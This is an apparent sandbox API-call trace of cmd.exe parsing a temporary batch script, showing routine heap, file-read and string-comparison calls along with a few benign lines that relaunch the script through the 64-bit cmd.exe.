0x19a8f1e0000 [0174.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0174.623] GetProcessHeap () returned 0x19a8f1e0000 [0174.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc20) returned 1 [0174.623] GetProcessHeap () returned 0x19a8f1e0000 [0174.624] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea4b0) returned 1 [0174.624] GetProcessHeap () returned 0x19a8f1e0000 [0174.624] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e6050) returned 1 [0174.624] GetProcessHeap () returned 0x19a8f1e0000 [0174.624] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0174.624] GetProcessHeap () returned 0x19a8f1e0000 [0174.624] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc80) returned 1 [0174.624] GetProcessHeap () returned 0x19a8f1e0000 [0174.624] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5f90) returned 1 [0174.624] GetProcessHeap () returned 0x19a8f1e0000 [0174.624] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0174.624] GetProcessHeap () returned 0x19a8f1e0000 [0174.624] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0174.624] GetProcessHeap () returned 0x19a8f1e0000 [0174.624] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0174.625] GetProcessHeap () returned 0x19a8f1e0000 [0174.625] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5ed0) returned 1 [0174.625] GetProcessHeap () returned 0x19a8f1e0000 [0174.625] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8c0) returned 1 [0174.625] GetProcessHeap () returned 0x19a8f1e0000 [0174.625] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec8e0) returned 1 [0174.625] GetProcessHeap () returned 0x19a8f1e0000 [0174.625] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0174.626] GetProcessHeap () returned 0x19a8f1e0000 [0174.626] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecee0) returned 1 [0174.626] GetProcessHeap () returned 0x19a8f1e0000 [0174.626] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0174.626] GetProcessHeap () returned 0x19a8f1e0000 [0174.626] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f86a0) returned 1 [0174.626] GetProcessHeap () returned 0x19a8f1e0000 [0174.627] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece20) returned 1 [0174.627] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.627] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ef [0174.627] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.627] SetFilePointer (in: hFile=0x88, lDistanceToMove=1521, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f1 [0174.627] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\n check the code below admin elevation to understand why it's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 2 [0174.627] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.627] GetFileType (hFile=0x88) returned 0x1 [0174.627] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.627] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f1 [0174.628] GetProcessHeap () returned 0x19a8f1e0000 [0174.628] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.628] GetProcessHeap () returned 0x19a8f1e0000 [0174.628] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.628] _tell (_FileHandle=3) returned 1521 [0174.628] _close (_FileHandle=3) returned 0 [0174.628] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.629] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.629] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.629] SetFilePointer (in: hFile=0x88, lDistanceToMove=1521, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f1 [0174.629] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.629] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f1 [0174.629] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.629] SetFilePointer (in: hFile=0x88, lDistanceToMove=1582, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62e [0174.629] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if exist %SystemRoot%\\Sysnative\\cmd.exe if not defined r1 (\r\n", cbMultiByte=61, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if exist %SystemRoot%\\Sysnative\\cmd.exe if not defined r1 (\r\n's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 61 [0174.629] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.629] GetFileType (hFile=0x88) returned 0x1 [0174.629] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.629] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62e [0174.630] GetProcessHeap () returned 0x19a8f1e0000 [0174.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.630] GetProcessHeap () returned 0x19a8f1e0000 [0174.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.630] GetProcessHeap () returned 0x19a8f1e0000 [0174.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb860 [0174.630] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.630] GetProcessHeap () returned 0x19a8f1e0000 [0174.630] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0174.630] GetProcessHeap () returned 0x19a8f1e0000 [0174.630] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.631] GetProcessHeap () returned 0x19a8f1e0000 [0174.631] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.631] _wcsicmp (_String1="if", _String2=")") returned 64 [0174.631] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0174.631] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0174.631] _wcsicmp (_String1="IF", _String2="if") returned 0 [0174.631] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0174.631] GetProcessHeap () returned 0x19a8f1e0000 [0174.631] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0174.631] GetProcessHeap () returned 0x19a8f1e0000 [0174.631] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1e5950 [0174.631] GetProcessHeap () returned 0x19a8f1e0000 [0174.631] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb980 [0174.632] GetProcessHeap () returned 0x19a8f1e0000 [0174.632] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb980, Size=0x1e) returned 0x19a8f1eb710 [0174.632] GetProcessHeap () returned 0x19a8f1e0000 [0174.632] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb710) returned 0x1e [0174.632] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0174.632] GetProcessHeap () returned 0x19a8f1e0000 [0174.632] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0174.632] GetProcessHeap () returned 0x19a8f1e0000 [0174.632] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb980 [0174.632] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0174.632] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0174.632] GetProcessHeap () returned 0x19a8f1e0000 [0174.632] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4a) returned 0x19a8f1f86a0 [0174.632] GetProcessHeap () returned 0x19a8f1e0000 [0174.632] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x84) returned 0x19a8f1e5e10 [0174.632] GetProcessHeap () returned 0x19a8f1e0000 [0174.632] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e10, Size=0x4c) returned 0x19a8f1e5e10 [0174.632] GetProcessHeap () returned 0x19a8f1e0000 [0174.632] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5e10) returned 0x4c [0174.632] _wcsicmp (_String1="if", _String2=")") returned 64 [0174.632] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0174.632] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0174.632] _wcsicmp (_String1="IF", _String2="if") returned 0 [0174.632] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0174.633] GetProcessHeap () returned 0x19a8f1e0000 [0174.633] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0174.633] GetProcessHeap () returned 0x19a8f1e0000 [0174.633] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecae0 [0174.633] GetProcessHeap () returned 0x19a8f1e0000 [0174.633] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0174.633] GetProcessHeap () returned 0x19a8f1e0000 [0174.633] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb9e0, Size=0x1a) returned 0x19a8f1eb770 [0174.633] GetProcessHeap () returned 0x19a8f1e0000 [0174.633] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb770) returned 0x1a [0174.633] _wcsicmp (_String1="not", _String2="/I") returned 63 [0174.633] GetProcessHeap () returned 0x19a8f1e0000 [0174.633] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0174.633] GetProcessHeap () returned 0x19a8f1e0000 [0174.633] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec800 [0174.633] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0174.633] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0174.633] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0174.633] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0174.633] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0174.633] GetProcessHeap () returned 0x19a8f1e0000 [0174.633] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0174.633] GetProcessHeap () returned 0x19a8f1e0000 [0174.633] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb9e0 [0174.633] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0174.634] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0174.634] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0174.634] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0174.634] GetProcessHeap () returned 0x19a8f1e0000 [0174.634] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec9a0 [0174.634] GetProcessHeap () returned 0x19a8f1e0000 [0174.634] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0174.634] GetProcessHeap () returned 0x19a8f1e0000 [0174.634] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb860, Size=0x18) returned 0x19a8f1eca80 [0174.634] GetProcessHeap () returned 0x19a8f1e0000 [0174.634] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eca80) returned 0x18 [0174.634] GetProcessHeap () returned 0x19a8f1e0000 [0174.634] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0174.634] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.634] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62e [0174.634] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea70, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea70*=0x1fff, lpOverlapped=0x0) returned 1 [0174.634] SetFilePointer (in: hFile=0x88, lDistanceToMove=1615, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x64f [0174.635] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="setlocal EnableDelayedExpansion\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="setlocal EnableDelayedExpansion\r\nmd.exe if not defined r1 (\r\n's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 33 [0174.635] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.635] GetFileType (hFile=0x88) returned 0x1 [0174.635] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.635] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x64f [0174.635] GetProcessHeap () returned 0x19a8f1e0000 [0174.635] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.635] GetProcessHeap () returned 0x19a8f1e0000 [0174.635] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.635] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0174.636] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0174.636] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0174.636] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0174.636] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0174.636] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0174.636] GetProcessHeap () returned 0x19a8f1e0000 [0174.636] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0174.636] GetProcessHeap () returned 0x19a8f1e0000 [0174.636] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb6b0 [0174.636] GetProcessHeap () returned 0x19a8f1e0000 [0174.636] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9220 [0174.636] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.636] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x64f [0174.636] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea10, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea10*=0x1fff, lpOverlapped=0x0) returned 1 [0174.636] SetFilePointer (in: hFile=0x88, lDistanceToMove=1674, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x68a [0174.636] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="start %SystemRoot%\\Sysnative\\cmd.exe /c \"\"!_cmdf!\" %* r1\"\r\n", cbMultiByte=59, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="start %SystemRoot%\\Sysnative\\cmd.exe /c \"\"!_cmdf!\" %* r1\"\r\n\r\n's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 59 [0174.637] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.637] GetFileType (hFile=0x88) returned 0x1 [0174.637] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.637] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x68a [0174.637] GetProcessHeap () returned 0x19a8f1e0000 [0174.637] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.637] GetProcessHeap () returned 0x19a8f1e0000 [0174.637] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.637] GetProcessHeap () returned 0x19a8f1e0000 [0174.637] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb6e0 [0174.637] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.637] GetProcessHeap () returned 0x19a8f1e0000 [0174.637] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0174.637] GetProcessHeap () returned 0x19a8f1e0000 [0174.638] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.638] GetProcessHeap () returned 0x19a8f1e0000 [0174.638] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.638] GetProcessHeap () returned 0x19a8f1e0000 [0174.638] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0174.639] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0174.639] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0174.639] _wcsicmp (_String1="IF", _String2="start") returned -10 [0174.639] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0174.639] _wcsicmp (_String1="REM", _String2="start") returned -1 [0174.639] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0174.639] GetProcessHeap () returned 0x19a8f1e0000 [0174.639] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0174.639] GetProcessHeap () returned 0x19a8f1e0000 [0174.639] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8c0 [0174.639] GetProcessHeap () returned 0x19a8f1e0000 [0174.639] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x72) returned 0x19a8f1ece20 [0174.639] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.639] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x68a [0174.639] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe9e0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe9e0*=0x1fff, lpOverlapped=0x0) returned 1 [0174.639] SetFilePointer (in: hFile=0x88, lDistanceToMove=1683, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x693 [0174.639] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="exit /b\r\nstemRoot%\\Sysnative\\cmd.exe /c \"\"!_cmdf!\" %* r1\"\r\n\r\n's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 9 [0174.640] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.640] GetFileType (hFile=0x88) returned 0x1 [0174.640] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.640] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x693 [0174.640] GetProcessHeap () returned 0x19a8f1e0000 [0174.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.640] GetProcessHeap () returned 0x19a8f1e0000 [0174.640] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.640] GetProcessHeap () returned 0x19a8f1e0000 [0174.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0174.640] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0174.640] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0174.640] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0174.641] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0174.641] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0174.641] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0174.641] GetProcessHeap () returned 0x19a8f1e0000 [0174.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0174.641] GetProcessHeap () returned 0x19a8f1e0000 [0174.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0174.641] GetProcessHeap () returned 0x19a8f1e0000 [0174.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc00 [0174.642] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.642] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x693 [0174.642] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe9b0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe9b0*=0x1fff, lpOverlapped=0x0) returned 1 [0174.642] SetFilePointer (in: hFile=0x88, lDistanceToMove=1686, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x696 [0174.642] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\nt /b\r\nstemRoot%\\Sysnative\\cmd.exe /c \"\"!_cmdf!\" %* r1\"\r\n\r\n's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 3 [0174.642] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.642] GetFileType (hFile=0x88) returned 0x1 [0174.642] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.642] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x696 [0174.642] GetProcessHeap () returned 0x19a8f1e0000 [0174.642] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.642] GetProcessHeap () returned 0x19a8f1e0000 [0174.643] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.643] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0174.643] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0174.643] _tell (_FileHandle=3) returned 1686 [0174.643] _close (_FileHandle=3) returned 0 [0174.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\Sysnative\\cmd.exe", nBufferLength=0x208, lpBuffer=0x43f9efea40, lpFilePart=0x43f9efe7e0 | out: lpBuffer="C:\\Windows\\Sysnative\\cmd.exe", lpFilePart=0x43f9efe7e0*="cmd.exe") returned 0x1c [0174.643] wcsncmp (_String1="C:\\W", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0174.643] FindFirstFileExW (in: lpFileName="C:\\Windows\\Sysnative\\cmd.exe" (normalized: "c:\\windows\\sysnative\\cmd.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7f0) returned 0xffffffffffffffff [0174.644] GetLastError () returned 0x3 [0174.644] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0174.644] GetLastError () returned 0x6 [0174.644] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.644] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.644] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.644] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.645] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.645] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.645] SetConsoleInputExeNameW () returned 0x1 [0174.645] GetConsoleOutputCP () returned 0x1b5 [0174.646] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.646] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.646] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, 